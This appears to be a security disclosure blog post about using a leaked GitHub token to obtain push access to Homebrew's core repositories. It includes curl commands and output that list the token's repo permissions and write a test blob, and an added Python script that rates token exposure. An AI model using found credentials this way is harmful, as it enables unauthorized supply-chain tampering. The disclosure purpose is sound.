How I gained commit access to Homebrew in 30 minutes

Let’s get leaky

$ curl https://api.github.com/user/repos -u $GITHUB_API_TOKEN:x-oauth-basic | jq '.[] | {repo: .full_name, permissions: .permissions}'
{
  "repo": "BrewTestBot/homebrew-core",
  "permissions": {
    "admin": true,
    "push": true,
    "pull": true
  }
}
{
  "repo": "Homebrew/brew",
  "permissions": {
    "admin": false,
    "push": true,
    "pull": true
  }
}
{
  "repo": "Homebrew/formulae.brew.sh",
  "permissions": {
    "admin": false,
    "push": true,
    "pull": true
  }
}
{
  "repo": "Homebrew/homebrew-core",
  "permissions": {
    "admin": false,
    "push": true,
    "pull": true
  }
}
  • Homebrew/brew
  • Homebrew/homebrew-core
  • Homebrew/formulae.brew.sh
$ curl https://api.github.com/repos/Homebrew/homebrew-core/git/blobs -u $GITHUB_API_TOKEN:x-oauth-basic -d '{"content":"test"}' -H "Content-Type: application/json"
{
  "sha": "30d74d258442c7c65512eafab474568dd706c430",
  "url": "https://api.github.com/repos/Homebrew/homebrew-core/git/blobs/30d74d258442c7c65512eafab474568dd706c430"
}

What this means

  • Hundreds of thousands of people use Homebrew, including employees at some of the biggest companies in Silicon Valley.
  • The most frequently installed package in the last 30 days is openssl, which was installed over 500k times: https://formulae.brew.sh/analytics/install/30d/
  • I had direct commit access to the Homebrew/homebrew-core repo. At the time, this repo did not have a protected master branch, meaning I would have been able to make a fast-forward change to refs/heads/master. Anyone who freshly installed Homebrew, or ran brew update, would have received my malicious formulae.
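The two facts that made this severe are visible in the API output above: the token had push on Homebrew/homebrew-core, and that repo's master branch was unprotected. The following is an added example (not code from the original post) that turns those facts into a token blast-radius check: it parses a response in the shape of the /user/repos output shown above and rates each repo, treating push access to an unprotected default branch as the worst case. The repo list and the branch-protection statuses are constructed for the example; only homebrew-core's unprotected master comes from the post.

```python
import json

# Constructed sample modelled on the /user/repos output shown above;
# the extra read-only repo is added to show the "low" case.
USER_REPOS_JSON = """
[
  {"full_name": "BrewTestBot/homebrew-core",
   "permissions": {"admin": true, "push": true, "pull": true}},
  {"full_name": "Homebrew/brew",
   "permissions": {"admin": false, "push": true, "pull": true}},
  {"full_name": "Homebrew/formulae.brew.sh",
   "permissions": {"admin": false, "push": true, "pull": true}},
  {"full_name": "Homebrew/homebrew-core",
   "permissions": {"admin": false, "push": true, "pull": true}},
  {"full_name": "someone/dotfiles",
   "permissions": {"admin": false, "push": false, "pull": true}}
]
"""

# Constructed: whether the default branch of each repo has protection
# enabled (GitHub's branch-protection endpoint returns 404 when it does not).
# Assumption for this example; the post only states that homebrew-core's
# master was unprotected at the time.
BRANCH_PROTECTED = {
    "BrewTestBot/homebrew-core": False,
    "Homebrew/brew": True,
    "Homebrew/formulae.brew.sh": True,
    "Homebrew/homebrew-core": False,
    "someone/dotfiles": False,
}

def classify(perms, protected):
    """Rate what the holder of the token could do to one repository."""
    if perms.get("admin"):
        return "critical"   # can change settings, drop protection, add keys
    if perms.get("push") and not protected:
        return "critical"   # can fast-forward the default branch directly
    if perms.get("push"):
        return "high"       # can push branches; default branch still gated
    return "low"            # read-only

def audit_token(repos_json, protection):
    """Map each repo the token can see to its risk rating."""
    repos = json.loads(repos_json)
    return {r["full_name"]: classify(r["permissions"],
                                     protection.get(r["full_name"], False))
            for r in repos}

if __name__ == "__main__":
    for repo, risk in sorted(audit_token(USER_REPOS_JSON, BRANCH_PROTECTED).items()):
        print(f"{risk:8} {repo}")
```

Any "critical" line is a repo whose contents a token holder could change without review, which is exactly the condition the post describes for homebrew-core.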

What’s being done


Operations Engineer at Remind

Eric Holmes